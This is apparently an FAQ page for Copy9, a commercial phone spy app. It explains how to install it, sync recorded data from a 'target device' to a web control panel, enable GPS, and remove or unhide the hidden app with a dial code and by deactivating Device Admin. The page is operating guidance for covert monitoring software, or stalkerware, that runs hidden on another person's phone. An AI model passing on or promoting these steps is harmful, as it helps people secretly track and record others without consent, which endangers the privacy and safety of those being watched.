Guide – Copy9 Cell Phone Spy App
Visit Copy9.com/faq to have more answers.
Read How To Use Copy9
How to install Copy9?
Download HERE: http://copy9.com/download-copy9-spy-app/
After I installed copy9, What Should I Do Next?
Login account to Control Panel Copy9 (my.Copy9.com)
– Click Settings ->Sync Settings, and click Save & Sync Now ( after change function on Sync Settings) to make a synchronize between server/target devices IMMEDIATELY.
After I installed copy9, how long do I have to wait to review recorded data?
How to turn on GPS in your smartphone?
- With Android 6+: From main menu tap Settings -> additional settings ->Privacy -> Local , Enable Location access.
- With Android 4+: From main menu tap Settings -> Location and Security -> in group My Location, Enable GPS satellites.
Can I remove Copy9 remotely?
– Login with your account at user control panel http://my.copy9.com
– Go to menu Settings on top right, and click Uninstall menu
– It displays password form, please enter your password to confirm you want to uninstall remotely.
– Click button Uninstall Remotely and it will uninstall Copy9 application from the target device with some minutes (until it meet next synchronize time).
How to unhide or uninstall the Copy9 application from target phone?
In case you can keep target device in your hand
From Phone Call on target device -> Press: #5555* and Call
– With Android 6+ you must deactivate Device Admin in session Settings/Additional settings/ Privacy/Deactivate Device administrator.
– With Android 4+ you must deactivate Device Admin in session Settings/More/Security.